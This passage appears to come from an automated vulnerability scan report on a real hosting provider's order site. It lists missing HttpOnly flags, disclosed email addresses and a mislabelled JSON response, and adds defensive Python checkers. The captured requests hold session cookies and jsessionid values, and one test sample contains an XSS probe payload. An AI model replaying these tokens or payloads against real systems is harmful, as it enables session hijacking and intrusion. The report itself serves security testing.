Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:37:27 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642647822&__frame=_top&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=UaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 20:51:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 0


5.172. http://order.1and1.com/xml/order/tariffselect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/tariffselect HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:38:17 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=8853c31122ce000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/tariffselect;jsessionid=80078DB13C40A8A96EDAE7880B9E1DB8.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain

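The cookie findings in 5.165 to 5.172 all reduce to the same two checks: which attribute flags a Set-Cookie line lacks, and whether the cookie is the one that actually carries the session. The following Python is an added example, not part of the XSS.CX report, that runs those checks over header lines copied from the responses above. Note that in these responses the servlet session id is not in any cookie at all: it is rewritten into the URL path (the `;jsessionid=` segment of the Location headers, and of the Referer header in 5.171), so the example also extracts those, since a session id in a URL ends up in proxy logs, browser history and outbound Referer headers. The third Set-Cookie line (JSESSIONID with Secure and HttpOnly) is a hypothetical hardened cookie added for contrast and does not come from the report; `SESSION_HINT` is a name heuristic of my own, which is why the scanner's advice to review the cookie's contents still stands.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample input: Set-Cookie and Location lines copied from the
# responses in findings 5.165-5.172. The JSESSIONID line is a hypothetical
# hardened cookie added for contrast; it is not from the report.
SAMPLE_RESPONSE_HEADERS = [
    "Set-Cookie: __PFIX_TST_=7a09ad3484127800; Path=/",
    "Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 22:01:04 GMT; Path=/",
    "Set-Cookie: JSESSIONID=0123456789ABCDEF; Path=/; Secure; HttpOnly",
    "Location: http://order.1and1.com/xml/order/popupServerOsCds;jsessionid=1AF14401B4F592D397D86232610BA605.TCpfix142a",
]

# Name fragments that usually mark a session or auth token. This is only a
# hint (an assumption of this example); the analyst still confirms the cookie's role.
SESSION_HINT = re.compile(r"sess|sid|token|auth|login", re.I)
# Servlet URL rewriting places the session id in the path: /page;jsessionid=<id>
PATH_SESSION = re.compile(r";jsessionid=([^;?/]+)", re.I)


@dataclass
class CookieFinding:
    name: str
    missing: list        # attribute flags that are absent
    session_hint: bool   # name suggests a session/auth token


def parse_set_cookie(line):
    """Return (name, value, {attribute_lower: value}) for one Set-Cookie line."""
    body = line.split(":", 1)[1].strip()
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookies(headers, served_over_https):
    """Report cookies missing HttpOnly (and Secure, when the site is HTTPS)."""
    findings = []
    for line in headers:
        if not line.lower().startswith("set-cookie:"):
            continue
        name, _value, attrs = parse_set_cookie(line)
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if served_over_https and "secure" not in attrs:
            missing.append("Secure")
        if missing:
            findings.append(CookieFinding(name, missing, bool(SESSION_HINT.search(name))))
    return findings


def session_ids_in_urls(headers):
    """Session ids carried in Location/Referer URLs rather than in a cookie."""
    ids = []
    for line in headers:
        if line.lower().startswith(("location:", "referer:")):
            url = line.split(":", 1)[1].strip()
            match = PATH_SESSION.search(urlsplit(url).path)
            if match:
                ids.append(match.group(1))
    return ids


if __name__ == "__main__":
    # order.1and1.com is reached over plain HTTP in the report, so Secure is not demanded here.
    for finding in audit_cookies(SAMPLE_RESPONSE_HEADERS, served_over_https=False):
        print(f"{finding.name}: missing {', '.join(finding.missing)}"
              f"{' (name looks like a session token)' if finding.session_hint else ''}")
    for sid in session_ids_in_urls(SAMPLE_RESPONSE_HEADERS):
        print(f"session id exposed in URL: {sid}")
```

Running it against the sample lines reports __PFIX_TST_ and UT as lacking HttpOnly, leaves the hardened JSESSIONID alone, and pulls the jsessionid value out of the Location URL. Pass `served_over_https=True` once the same endpoints are tested over TLS and the Secure flag becomes a requirement too.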

6. Email addresses disclosed
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://order.1and1.com/xml/order/FeatureDomainPdr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureDomainPdr

Issue detail

The following email addresses were disclosed in the response: jane@jane-domain.com (three times) and jane-domain.com@registrar.schlund.info. From the surrounding page content these read as illustrative sample addresses for the domain registration feature (an example registrant and its registrar-side proxy address) rather than personal mailboxes; confirm that before reporting them as a disclosure.

Request

GET /xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:39:38 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:53:45 GMT; Path=/
ETag: 6aa33937828532fc07c39d975616575c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17619


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane@jane-domain.com</p>
...[SNIP]...
<p>jane-domain.com@registrar.schlund.info</p>
...[SNIP]...

6.2. http://order.1and1.com/xml/order/International

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/International

Issue detail

The following email address was disclosed in the response: yourname@yourdomain.com, a placeholder in the product description rather than a real mailbox.

Request

GET /xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:07 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:52:14 GMT; Path=/
ETag: ff92e81d1737af4a2a56f9b3afc85af1
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23585


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<p class="fine">5 dedicated POP3/IMAP e-mail accounts to create a yourname@yourdomain.com</p>
...[SNIP]...

6.3. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The following email address was disclosed in the response: your.name@yourdomain.com, again a placeholder in the product description rather than a real mailbox.

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=taV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCoqKSclJyo=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:26:AAABLtRlgbZ6_eg4OG2LZboWFQTS2jli:1300643545526; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:06 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSsrKigmKCs=; Expires=Fri, 07-Apr-2079 21:06:13 GMT; Path=/
ETag: d9cfb4af92e44225f0ad2cca48eb1ca6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18209


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<strong>your.name@yourdomain.com</strong>
...[SNIP]...

6.4. http://order.1and1.com/xml/order/MailXchange

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MailXchange

Issue detail

The following email address was disclosed in the response: bizsolutions@1and1.com, a published sales contact address.

Request

GET /xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ra2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 21:38:52 GMT; Path=/
ETag: 80d79fb7f81c76e6606c17b109cfe0c5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24474


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<a href="mailto:bizsolutions@1and1.com">bizsolutions@1and1.com</a>
...[SNIP]...

6.5. http://order.1and1.com/xml/order/PrivacyPolicy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The following email addresses were disclosed in the response: PrivacyPolicy@1and1.com and abuse@1and1.com, both role addresses published intentionally on the privacy policy page, which is the kind of anonymous mailbox the remediation above recommends.

Request

GET /xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=idGk5PD0zXFxcVmlfZixkXisdJ2BTZDxTRkAoLCkpKCYoJiMjJiUfIiYZGxowLVJAbGFjcSkrJlYvWWguISIeHSIeHDY0LjYtLDVtbjQpMGBpLyIjHx4jIB0gMjU2LzA=; Expires=Fri, 07-Apr-2079 21:50:43 GMT; Path=/
ETag: 3dd7dc19c0118095f7d091fc8a56e2d8
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24721


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<a href="mailto:PrivacyPolicy@1and1.com">PrivacyPolicy@1and1.com</a>
...[SNIP]...
<a href="mailto:abuse@1and1.com">abuse@1and1.com</a>
...[SNIP]...

7. Content type incorrectly stated

Summary

Severity:   Information
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/webservice/VDSPriceService

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain;charset=utf-8. The response states that it contains plain text. However, it actually appears to contain JSON (the body is a JSON-RPC style result object, see below).

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /xml/webservice/VDSPriceService;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: text/plain
wstype: jsonws
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=
Content-Length: 57

{"method":"getVDSPrice","params":[1,1,100,"vdslinuxset"]}

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain;charset=utf-8
Content-Length: 249

{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},"campaignPriceString":"0.00","campaignPriceStringBrutto":
...[SNIP]...
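The check behind finding 7 is mechanical enough to automate: compare the declared Content-Type with what the body looks like, and at the same time check for the X-Content-Type-Options: nosniff header that stops browsers second-guessing the declared type. The following Python is an added example and not part of the XSS.CX report. It uses the VDSPriceService response headers and the truncated JSON body shown above as one sample, which is why the sniffer falls back to a structural prefix match when json.loads rejects a cut-off capture; the application/json and HTML-in-text/plain cases are constructed for contrast and do not come from the report.

```python
import json
import re

# Constructed samples. "vdsprice" is the header and truncated body of the
# VDSPriceService response in finding 7; the other two are made up for contrast.
SAMPLE_RESPONSES = {
    "vdsprice": (
        {"Content-Type": "text/plain;charset=utf-8"},
        '{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,'
        '"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},'
        '"campaignPriceString":"0.00","campaignPriceStringBrutto":',  # cut off, as in the report
    ),
    "json_ok": (
        {"Content-Type": "application/json; charset=utf-8", "X-Content-Type-Options": "nosniff"},
        '{"ok": true}',
    ),
    "html_as_text": (
        {"Content-Type": "text/plain"},
        "<html><body><script>alert(1)</script></body></html>",
    ),
}

# A JSON object/array whose first token is a quoted string (typical of API output).
JSON_START = re.compile(r'^\s*[\[{]\s*"')
# Markup at the very start of the body; enough for a first-pass triage sniff.
HTML_START = re.compile(r"^\s*<(!doctype|html|script|body|div)", re.I)

# Which declared MIME types are acceptable for each sniffed body kind.
EXPECTED = {"json": {"application/json"}, "html": {"text/html"}}


def declared_mime(headers):
    """The media type from Content-Type, without parameters, lower-cased."""
    value = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    return value.split(";", 1)[0].strip().lower()


def sniff_body(body):
    """Best-effort guess of what the body really is: json, html or text."""
    try:
        json.loads(body)
        return "json"
    except ValueError:
        pass  # malformed or, as in the captured sample, truncated
    if JSON_START.match(body):
        return "json"
    if HTML_START.match(body):
        return "html"
    return "text"


def has_nosniff(headers):
    return any(k.lower() == "x-content-type-options" and v.strip().lower() == "nosniff"
               for k, v in headers.items())


def check_content_type(headers, body):
    """Return (sniffed kind, list of problems) for one response."""
    declared = declared_mime(headers)
    actual = sniff_body(body)
    problems = []
    if actual in EXPECTED and declared not in EXPECTED[actual]:
        problems.append(f"declared {declared or '(none)'} but body looks like {actual}")
    if not has_nosniff(headers):
        problems.append("missing X-Content-Type-Options: nosniff")
    return actual, problems


if __name__ == "__main__":
    for label, (headers, body) in SAMPLE_RESPONSES.items():
        actual, problems = check_content_type(headers, body)
        print(f"{label}: body sniffed as {actual}; " + ("; ".join(problems) or "ok"))
```

For the VDSPriceService sample this reports the text/plain versus JSON mismatch and the absent nosniff header; the fix the remediation asks for is `Content-Type: application/json` on that endpoint, with `X-Content-Type-Options: nosniff` as a site-wide backstop. The HTML-as-text/plain case is the one worth escalating if it ever shows up with user-controlled content, because that is where an incorrect type can turn into cross-site scripting.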
